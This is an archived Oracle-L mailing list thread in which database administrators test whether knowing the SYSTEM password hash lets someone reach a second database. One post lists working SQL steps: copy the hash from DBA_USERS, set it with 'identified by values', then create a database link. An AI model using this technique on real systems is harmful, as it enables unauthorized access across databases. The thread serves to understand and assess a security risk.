Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: Risk of knowing password hash value (Was: OEM permissions)

Re: Risk of knowing password hash value (Was: OEM permissions)

From: Jared Still <jkstill_at_cybcon.com>
Date: Mon, 22 Dec 2003 20:59:25 -0800
Message-ID: <F001.005DAAA5.20031222205925@fatcity.com> 






It doesn't matter which account I logged into DB2 with, as
long as that account has privileges to read DBA_USERS.



SYSTEM was used simply because it was the only account
on the database that could be logged into remotely, so
my test could be run without switching between machines.



If I had granted SELECT_CATALOG_ROLE  to scott, I could 
have logged in  as SCOTT and done the same.



Jared



PS. Forgot this in private post to Yong:  The password is
cached, I assume in the PGA.  This doesn't work without
reconnecting.  Logging out isn't strictly necessary, but
the way my shell is setup, it takes quite a few less keystrokes
to logout/logon than the type 'connect system/password_at_db2'.





On Mon, 2003-12-22 at 20:19, Yong Huang wrote:


> Jared,

> 

> I see you log out and log back in as SYSTEM to DB2. But how do you know the

> password for SYSTEM to log back in with after you change it?

> 

> What if you don't log out? When I tried that (i.e. not logging out), I got

> ORA-1017.


> 

> Yong Huang

> 

> --- Jared Still <jkstill_at_cybcon.com> wrote:

> > Environment:

> > 

> > DB1: RH 8.0 with Oracle EE 9.2.0.4

> > 

> > DB2: Win2k SP3 with Oracle EE 9.2.0.1

> > 

> > SYSTEM user on each database initially have different passwords.

> > 

> > It goes something like this:

> > 

> > DB1:

> > 

> > select password from dba_users where username = 'SYSTEM';

> > 

> > Let's say the result is 'AC424SDK4398'

> > 

> > DB2:

> > 

> > Logon to DB2 as SYSTEM.

> > 

> > alter user SYSTEM identified by values 'AC424SDK4398';

> > create database link systemlink using 'DB1';

> > 

> > Logout, and log back on to DB2 as SYSTEM.

> > 

> > select count(*) from v$session_at_systemlink;

> > 

> > Works for me in this environment.  DB2 is compromised.

> > 

> > HTH


> > 

> > Jared

> > 

> > 

> > 

> > On Mon, 2003-12-22 at 08:29, Yong Huang wrote:

> > 

> > > Hi, Gregory,

> > > 

> > > I only have access to Oracle 9.2 on my laptop. Here's my test. I have ORCL

> > and

> > > AUX1 databases, the latter created by RMAN DUPLICATE some time ago. I logon

> > > AUX1 as SYSTEM. Set SYSTEM password hash value to the same as in ORCL.

> > Create

> > > link L to ORCL without password. Selecting from a table in ORCL @L (i.e.

> > select

> > > * from yongtest_at_l) throws ORA-1017 invalid username/password.

> > > 

> > > Alternatively, I logon as SYS and create a procedure owned by SYSTEM, with

> > one

> > > line execute imediate('select count(*) from yongtest_at_l'). When I execute

> > > system.<this procedure> as SYS, I get ORA-1005 null password given. (I

> > could

> > > use DBMS_SYS_SQL but using the execute immediate trick obviates the need to

> > > remember the syntax in that undocumented package).

> > > 

> > > If I use connect to current_user to create the link, I always get ORA-28030

> > > Server encountered problems accessing LDAP directory service.

> > > 

> > > Could you try on your databases and show how you do it? As I said, this may

> > be

> > > a security problem. I'm just too ignorant of it and can't reproduce it for

> > now.

> > > 

> > > Yong Huang

> > > 

> > > Norris, Gregory T [ITS] wrote:

> > > 

> > > There's no reason I can see that he couldn't create the dblink first, and

> > then 

> > > reset the password using the encrypted value.  Alternately, the dblink

> > could be

> > > 

> > > created using the DBMS_SYS_SQL package... no knowledge of the current

> > password 

> > > required.

> > > 

> > > 	create database link foo

> > > 	   connect to current_user

> > > 	   using 'bar';

> 

> __________________________________

> Do you Yahoo!?

> New Yahoo! Photos - easier uploading and sharing.

> http://photos.yahoo.com/

> -- 

> Please see the official ORACLE-L FAQ: http://www.orafaq.net

> -- 

> Author: Yong Huang

>   INET: yong321_at_yahoo.com

> 

> Fat City Network Services    -- 858-538-5051 http://www.fatcity.com

> San Diego, California        -- Mailing list and web hosting services

> ---------------------------------------------------------------------

> To REMOVE yourself from this mailing list, send an E-Mail message

> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> the message BODY, include a line containing: UNSUB ORACLE-L

> (or the name of mailing list you want to be removed from).  You may

> also send the HELP command for other information (like subscribing).

> 




-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.net
-- 
Author: Jared Still
  INET: jkstill_at_cybcon.com

Fat City Network Services    -- 858-538-5051 http://www.fatcity.com
San Diego, California        -- Mailing list and web hosting services
---------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Mon Dec 22 2003 - 22:59:25 CST












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US